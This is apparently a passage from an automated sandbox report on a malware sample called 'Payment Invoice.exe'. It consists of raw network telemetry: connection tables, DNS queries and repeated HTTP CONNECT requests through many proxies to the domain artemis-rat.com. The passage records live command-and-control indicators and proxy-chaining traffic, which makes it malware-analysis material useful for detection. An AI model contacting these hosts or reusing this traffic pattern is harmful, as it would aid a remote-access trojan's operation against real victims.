                                                                Mar 11, 2024 16:15:16.182003975 CET511921080192.168.2.427.0.234.206
                                                                Mar 11, 2024 16:15:16.182346106 CET5146380192.168.2.458.234.116.197
                                                                Mar 11, 2024 16:15:16.182348967 CET800050892128.199.184.169192.168.2.4
                                                                Mar 11, 2024 16:15:16.182379007 CET511918083192.168.2.4185.132.242.212
                                                                Mar 11, 2024 16:15:16.182507992 CET514641080192.168.2.427.0.234.206
                                                                Mar 11, 2024 16:15:16.182903051 CET5011636694192.168.2.451.75.126.150
                                                                Mar 11, 2024 16:15:16.182919979 CET5031024815192.168.2.495.217.104.21
                                                                Mar 11, 2024 16:15:16.182929993 CET510344153192.168.2.4190.15.216.237
                                                                Mar 11, 2024 16:15:16.183367968 CET514658083192.168.2.4185.132.242.212
                                                                Mar 11, 2024 16:15:16.183412075 CET5119380192.168.2.439.105.5.126
                                                                Mar 11, 2024 16:15:16.183440924 CET5146680192.168.2.439.105.5.126
                                                                Mar 11, 2024 16:15:16.183597088 CET512578888192.168.2.466.45.246.194
                                                                Mar 11, 2024 16:15:16.184025049 CET51459443192.168.2.443.153.174.197
                                                                Mar 11, 2024 16:15:16.184035063 CET4435145943.153.174.197192.168.2.4
                                                                Mar 11, 2024 16:15:16.184079885 CET4435145943.153.174.197192.168.2.4
                                                                Mar 11, 2024 16:15:16.184107065 CET514678888192.168.2.466.45.246.194
                                                                Mar 11, 2024 16:15:16.185630083 CET51468443192.168.2.443.153.174.197
                                                                Mar 11, 2024 16:15:16.185650110 CET4435146843.153.174.197192.168.2.4
                                                                Mar 11, 2024 16:15:16.185719967 CET51468443192.168.2.443.153.174.197
                                                                Mar 11, 2024 16:15:16.186722040 CET5051180192.168.2.43.127.62.252
                                                                Mar 11, 2024 16:15:16.186825991 CET41455088682.137.244.59192.168.2.4
                                                                Mar 11, 2024 16:15:16.186954021 CET414551364184.170.248.5192.168.2.4
                                                                Mar 11, 2024 16:15:16.187817097 CET51468443192.168.2.443.153.174.197
                                                                Mar 11, 2024 16:15:16.187827110 CET4435146843.153.174.197192.168.2.4
                                                                Mar 11, 2024 16:15:16.187849045 CET4435146843.153.174.197192.168.2.4
                                                                Mar 11, 2024 16:15:16.188251972 CET504983128192.168.2.418.135.211.182
                                                                Mar 11, 2024 16:15:16.188455105 CET51469443192.168.2.443.153.174.197
                                                                Mar 11, 2024 16:15:16.188472986 CET4435146943.153.174.197192.168.2.4
                                                                Mar 11, 2024 16:15:16.188550949 CET51469443192.168.2.443.153.174.197
                                                                Mar 11, 2024 16:15:16.188864946 CET51469443192.168.2.443.153.174.197
                                                                Mar 11, 2024 16:15:16.188874006 CET4435146943.153.174.197192.168.2.4
                                                                Mar 11, 2024 16:15:16.188890934 CET4435146943.153.174.197192.168.2.4
                                                                Mar 11, 2024 16:15:16.189709902 CET8051405104.18.136.28192.168.2.4
                                                                Mar 11, 2024 16:15:16.189944983 CET47115026567.43.227.227192.168.2.4
                                                                Mar 11, 2024 16:15:16.189948082 CET5140580192.168.2.4104.18.136.28
                                                                Mar 11, 2024 16:15:16.190150976 CET808150793178.141.249.246192.168.2.4
                                                                Mar 11, 2024 16:15:16.190383911 CET312850722176.58.96.11192.168.2.4
                                                                Mar 11, 2024 16:15:16.190480947 CET507223128192.168.2.4176.58.96.11
                                                                Mar 11, 2024 16:15:16.190494061 CET414550845103.210.35.40192.168.2.4
                                                                Mar 11, 2024 16:15:16.192069054 CET3128513583.21.101.158192.168.2.4
                                                                Mar 11, 2024 16:15:16.192147970 CET513583128192.168.2.43.21.101.158
                                                                Mar 11, 2024 16:15:16.192672968 CET41454996936.90.61.224192.168.2.4
                                                                Mar 11, 2024 16:15:16.193140984 CET80805039595.57.216.118192.168.2.4
                                                                Mar 11, 2024 16:15:16.193269014 CET5086980192.168.2.452.67.10.183
                                                                Mar 11, 2024 16:15:16.193723917 CET507203128192.168.2.452.67.10.183
                                                                Mar 11, 2024 16:15:16.194799900 CET500778000192.168.2.414.103.24.20
                                                                Mar 11, 2024 16:15:16.195107937 CET505141080192.168.2.435.154.71.72
                                                                Mar 11, 2024 16:15:16.196620941 CET501481431192.168.2.472.10.164.178
                                                                Mar 11, 2024 16:15:16.196708918 CET503603128192.168.2.462.171.184.96
                                                                Mar 11, 2024 16:15:16.196854115 CET5140580192.168.2.4104.18.136.28
                                                                Mar 11, 2024 16:15:16.196898937 CET507223128192.168.2.4176.58.96.11
                                                                Mar 11, 2024 16:15:16.196996927 CET513583128192.168.2.43.21.101.158
                                                                Mar 11, 2024 16:15:16.198530912 CET5040180192.168.2.450.173.140.149
                                                                Mar 11, 2024 16:15:16.198569059 CET50074999192.168.2.4167.249.29.218
                                                                Mar 11, 2024 16:15:16.198590994 CET4976033590192.168.2.485.120.30.66
                                                                Mar 11, 2024 16:15:16.198627949 CET503453128192.168.2.4194.145.209.187
                                                                Mar 11, 2024 16:15:16.198676109 CET41455074172.195.34.41192.168.2.4
                                                                Mar 11, 2024 16:15:16.198736906 CET507414145192.168.2.472.195.34.41
                                                                Mar 11, 2024 16:15:16.198877096 CET8080503965.78.89.192192.168.2.4
                                                                Mar 11, 2024 16:15:16.199316978 CET5077880192.168.2.465.1.244.232
                                                                Mar 11, 2024 16:15:16.199821949 CET507414145192.168.2.472.195.34.41
                                                                Mar 11, 2024 16:15:16.200275898 CET4998517145192.168.2.467.43.236.18
                                                                Mar 11, 2024 16:15:16.201409101 CET808051310206.42.27.113192.168.2.4
                                                                Mar 11, 2024 16:15:16.201494932 CET513108080192.168.2.4206.42.27.113
                                                                Mar 11, 2024 16:15:16.201843977 CET513108080192.168.2.4206.42.27.113
                                                                Mar 11, 2024 16:15:16.201906919 CET514724145192.168.2.498.181.137.83
                                                                Mar 11, 2024 16:15:16.201935053 CET9995017045.229.34.174192.168.2.4
                                                                Mar 11, 2024 16:15:16.202047110 CET5147132650192.168.2.482.218.176.25
                                                                Mar 11, 2024 16:15:16.202383041 CET5147039522192.168.2.4173.212.209.49
                                                                Mar 11, 2024 16:15:16.203464031 CET3265050853103.216.51.36192.168.2.4
                                                                Mar 11, 2024 16:15:16.203835964 CET5147361524192.168.2.4147.139.133.15
                                                                Mar 11, 2024 16:15:16.203972101 CET514744145192.168.2.445.112.125.55
                                                                Mar 11, 2024 16:15:16.204777956 CET805106650.168.72.113192.168.2.4
                                                                Mar 11, 2024 16:15:16.204921007 CET414551138162.253.68.97192.168.2.4
                                                                Mar 11, 2024 16:15:16.205337048 CET19295106372.10.164.178192.168.2.4
                                                                Mar 11, 2024 16:15:16.205766916 CET514754153192.168.2.436.66.36.252
                                                                Mar 11, 2024 16:15:16.205868006 CET514768080192.168.2.4134.35.179.81
                                                                Mar 11, 2024 16:15:16.206178904 CET5137251306213.226.16.46192.168.2.4
                                                                Mar 11, 2024 16:15:16.207632065 CET5147734824192.168.2.492.204.135.37
                                                                Mar 11, 2024 16:15:16.207962990 CET3114751380209.121.164.50192.168.2.4
                                                                Mar 11, 2024 16:15:16.208053112 CET5138031147192.168.2.4209.121.164.50
                                                                Mar 11, 2024 16:15:16.208302975 CET5138031147192.168.2.4209.121.164.50
                                                                Mar 11, 2024 16:15:16.208816051 CET5147814325192.168.2.467.43.236.22
                                                                Mar 11, 2024 16:15:16.209513903 CET514794145192.168.2.4184.181.217.220
                                                                Mar 11, 2024 16:15:16.209930897 CET514801111192.168.2.4103.165.155.238
                                                                Mar 11, 2024 16:15:16.210621119 CET312850632185.191.236.162192.168.2.4
                                                                Mar 11, 2024 16:15:16.210689068 CET506323128192.168.2.4185.191.236.162
                                                                Mar 11, 2024 16:15:16.211158991 CET506323128192.168.2.4185.191.236.162
                                                                Mar 11, 2024 16:15:16.211417913 CET5148125154192.168.2.4159.223.166.21
                                                                Mar 11, 2024 16:15:16.211740017 CET514824153192.168.2.4103.94.133.92
                                                                Mar 11, 2024 16:15:16.212054968 CET514835432192.168.2.445.196.151.134
                                                                Mar 11, 2024 16:15:16.213293076 CET514841975192.168.2.441.33.203.233
                                                                Mar 11, 2024 16:15:16.213835955 CET5148580192.168.2.4172.67.182.165
                                                                Mar 11, 2024 16:15:16.214113951 CET567849903176.119.227.65192.168.2.4
                                                                Mar 11, 2024 16:15:16.214148045 CET5033732824192.168.2.451.68.164.77
                                                                Mar 11, 2024 16:15:16.214154005 CET5041780192.168.2.450.218.57.68
                                                                Mar 11, 2024 16:15:16.214200020 CET510421951192.168.2.4178.33.163.156
                                                                Mar 11, 2024 16:15:16.214214087 CET503493128192.168.2.446.101.102.134
                                                                Mar 11, 2024 16:15:16.214214087 CET5061114282192.168.2.4192.252.208.70
                                                                Mar 11, 2024 16:15:16.216001987 CET808151038193.239.56.84192.168.2.4
                                                                Mar 11, 2024 16:15:16.216722012 CET514873128192.168.2.4193.248.35.153
                                                                Mar 11, 2024 16:15:16.216943026 CET514868080192.168.2.4117.160.250.163
                                                                Mar 11, 2024 16:15:16.216959000 CET514881134192.168.2.4220.134.221.76
                                                                Mar 11, 2024 16:15:16.217164040 CET514898080192.168.2.4200.55.249.135
                                                                Mar 11, 2024 16:15:16.217358112 CET5149045639192.168.2.4103.212.93.201
                                                                Mar 11, 2024 16:15:16.217529058 CET514911088192.168.2.446.227.37.185
                                                                Mar 11, 2024 16:15:16.217650890 CET514923128192.168.2.451.159.134.210
                                                                Mar 11, 2024 16:15:16.218332052 CET5149312217192.168.2.491.134.140.160
                                                                Mar 11, 2024 16:15:16.218969107 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219016075 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219079018 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:16.219085932 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219166994 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219202042 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219290972 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219299078 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:16.219331026 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219367027 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219377995 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:16.219400883 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219434023 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219439030 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:16.219468117 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219492912 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:16.219501019 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219506025 CET514946879192.168.2.467.43.228.253
                                                                Mar 11, 2024 16:15:16.219532967 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219567060 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219671965 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219706059 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219738007 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219772100 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219805002 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:16.219805002 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:16.219805002 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:16.219805002 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:16.219839096 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219872952 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219907999 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219924927 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:16.219942093 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.219980001 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.220012903 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.220079899 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.220103979 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:16.220103979 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:16.220134020 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.220169067 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.220185995 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:16.220202923 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.220263004 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:16.220263004 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.220305920 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.220340014 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.220365047 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:16.220377922 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.220446110 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.220468998 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:16.220514059 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.220546961 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.220563889 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:16.220643997 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.220684052 CET500628000192.168.2.4137.184.200.42
                                                                Mar 11, 2024 16:15:16.220710039 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.220776081 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.220843077 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.220876932 CET800050062137.184.200.42192.168.2.4
                                                                Mar 11, 2024 16:15:16.220895052 CET500628000192.168.2.4137.184.200.42
                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Mar 11, 2024 16:15:11.119218111 CET192.168.2.41.1.1.10xbf64Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                Mar 11, 2024 16:15:14.931765079 CET192.168.2.41.1.1.10xd471Standard query (0)ktxcomay.com.vnA (IP address)IN (0x0001)false
                                                                Mar 11, 2024 16:15:20.464509964 CET192.168.2.41.1.1.10x69aaStandard query (0)artemis-rat.comA (IP address)IN (0x0001)false
                                                                Mar 11, 2024 16:15:23.083357096 CET192.168.2.41.1.1.10x21ccStandard query (0)www.avis.com.hnA (IP address)IN (0x0001)false
                                                                Mar 11, 2024 16:15:27.362216949 CET192.168.2.41.1.1.10xa2c4Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                Mar 11, 2024 16:15:30.057159901 CET192.168.2.41.1.1.10x3582Standard query (0)mail.orako.co.keA (IP address)IN (0x0001)false
                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Mar 11, 2024 16:15:11.273859978 CET1.1.1.1192.168.2.40xbf64No error (0)github.com140.82.113.4A (IP address)IN (0x0001)false
                                                                Mar 11, 2024 16:15:15.659727097 CET1.1.1.1192.168.2.40xd471No error (0)ktxcomay.com.vn222.255.238.159A (IP address)IN (0x0001)false
                                                                Mar 11, 2024 16:15:20.625308037 CET1.1.1.1192.168.2.40x69aaNo error (0)artemis-rat.com172.67.140.87A (IP address)IN (0x0001)false
                                                                Mar 11, 2024 16:15:20.625308037 CET1.1.1.1192.168.2.40x69aaNo error (0)artemis-rat.com104.21.54.158A (IP address)IN (0x0001)false
                                                                Mar 11, 2024 16:15:23.693087101 CET1.1.1.1192.168.2.40x21ccNo error (0)www.avis.com.hn172.67.199.231A (IP address)IN (0x0001)false
                                                                Mar 11, 2024 16:15:23.693087101 CET1.1.1.1192.168.2.40x21ccNo error (0)www.avis.com.hn104.21.84.251A (IP address)IN (0x0001)false
                                                                Mar 11, 2024 16:15:27.517195940 CET1.1.1.1192.168.2.40xa2c4No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                Mar 11, 2024 16:15:27.517195940 CET1.1.1.1192.168.2.40xa2c4No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                Mar 11, 2024 16:15:27.517195940 CET1.1.1.1192.168.2.40xa2c4No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                Mar 11, 2024 16:15:28.725908995 CET1.1.1.1192.168.2.40xf826No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                Mar 11, 2024 16:15:28.725908995 CET1.1.1.1192.168.2.40xf826No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                Mar 11, 2024 16:15:30.806006908 CET1.1.1.1192.168.2.40x3582No error (0)mail.orako.co.keorako.co.keCNAME (Canonical name)IN (0x0001)false
                                                                Mar 11, 2024 16:15:30.806006908 CET1.1.1.1192.168.2.40x3582No error (0)orako.co.ke34.195.165.88A (IP address)IN (0x0001)false
                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.4497804.182.9.1084437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:13.760225058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.4497894.182.9.1084437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:13.785356998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.449745172.67.254.127807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:13.818134069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:13.972569942 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:13 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.449761104.16.226.6807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:13.865722895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.020319939 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:13 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.449768104.21.6.88807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:13.885878086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.040241957 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:13 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.449762142.54.237.3441457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:13.924846888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.449788172.67.182.169807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:13.937225103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.091414928 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.449793104.17.9.114807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:13.949948072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.104017019 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.44977572.10.160.90309517076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:13.972038984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.149298906 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.449792162.243.102.20797647076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.018037081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.44975814.103.24.14880007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.045881033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
